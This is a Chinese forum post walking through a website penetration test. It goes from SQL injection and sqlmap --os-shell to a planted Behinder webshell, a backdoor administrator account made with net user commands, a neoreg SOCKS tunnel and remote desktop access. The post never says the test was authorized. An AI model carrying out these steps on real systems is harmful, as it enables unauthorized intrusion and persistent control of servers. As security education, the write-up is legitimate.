安全矩阵

 找回密码
 立即注册
搜索
查看: 967|回复: 0

记一次简单的且不完全的从外到内的渗透测试实战

[复制链接]

252

主题

252

帖子

1307

积分

金牌会员

Rank: 6Rank: 6

积分
1307
发表于 2022-8-15 23:12:51 | 显示全部楼层 |阅读模式
原文链接:记一次简单的且不完全的从外到内的渗透测试实战


0x01 相关知识点

SQlMAP --os-shell拿下webshell
众所周知,--os-shell的使用条件较为苛刻,必须满足:
  •         dba权限
  •         网站绝对路径
  •         php中的gpc为off,php为自动转义的状态

其中我想分享的是--os-shell的原理,其实就是很简单的两个脚本文件的上传:
遍历路径,into outfile函数将可执行的php文件,这个php文件(tmpukjhb.php)主要是起一个文件上传的作用。
然后通过tmpukjhb.php上传一个可以执行命令的php文件(tmpbezal.php),并将其结果返回出来。
(上次面试被问到了,没答出来,所以印象深刻)
nt authority \system和administrator
nt authority \system是系统的最高权限
administrator是用户的最高权限
reGeorg+proxifier流量转发

0x02 针对web应用服务器的getshell

通过对网站乱七八糟的一通乱点,发现有个熟悉的老朋友
编辑
见到这种,就不得不试试sql注入了。
在后面跟上单引号,直接报错
编辑
确定好注入点之后,sqlmap一把梭
一般我遇到sql注入首先看是不是dba权限,是的话大概率就能--os-shell就直接拿shell很方便。
麻溜的--is-dba,果然是
编辑
虽然现在没有绝对路径,但是sqlmap有字典可以先试试
编辑
编辑
只能说是很perfect
但是鉴于sqlmap返回太慢且只能返回whoami(估计是被杀了)不方便之后的操作,所以我访问了根目录底下的tmpukjhb.php上传了一个冰蝎的马。
编辑

0x03 不完全后渗透

通过whoami命令可以知道当前用户是nt authority \system(怎么会有人用计算机最高权限去部署服务呢?我不理解)
当然,有了最高权限就可以为所欲为了(白捡了一个哈哈哈哈)
然后就是常规步骤了(也不能说是常规,主要是最高计算机管理员给省略了很多步骤):
net user检查存在用户
编辑
net user admin admin / add创建一个名为admin的管理员用户
编辑
net localgroup administrators admin /add把admin用户添加到最高管理员用户组
编辑
net user admin查看用户权限
编辑
netstat -an | find "3389"查找3389端口是否开启
编辑
接着使用neoreg转发流量,把tuunel.php上传到根目录,并访问它
编辑
编辑
使用本地4444端口建立socks连接:python3 neoreg.py -k shy -u https://xxx.com/php/tunnel.php-p 4444
编辑
测试代理:使用代理访问搜狗curl -x socks5h://127.0.0.1:4444 https://www.sougou.com/
编辑
获取ip
编辑
进行流量代理
编辑
把loaclhost改成socks5代理
编辑
然后去远程桌面连接,把允许多人远程在线开启起来,方便之后的操作
编辑

0x04 结语

小菜鸟的文章,后面的操作比如横向、维持、清理等,都没有去做,只能说还要继续努力呀!
因为是从我笔记里面截的图(之前的图没有脱敏),所以可能有点糊,影响大家的观感(当然我觉得我这种小菜鸟的文章应该没人看哈哈哈哈),很真诚的给大家致歉!
如果本文有不正确的地方,希望各位大佬多(轻)多(点)包(喷)含(我),不(搞)吝(快)赐(带)教(我)!谢谢大家!

0x05 参考链接

https://www.cnblogs.com/zzjdbk/p ... ng-/p/10517114.html

回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

小黑屋|安全矩阵

GMT+8, 2024-4-18 20:49 , Processed in 0.016919 second(s), 18 queries .

Powered by Discuz! X4.0

Copyright © 2001-2020, Tencent Cloud.

快速回复 返回顶部 返回列表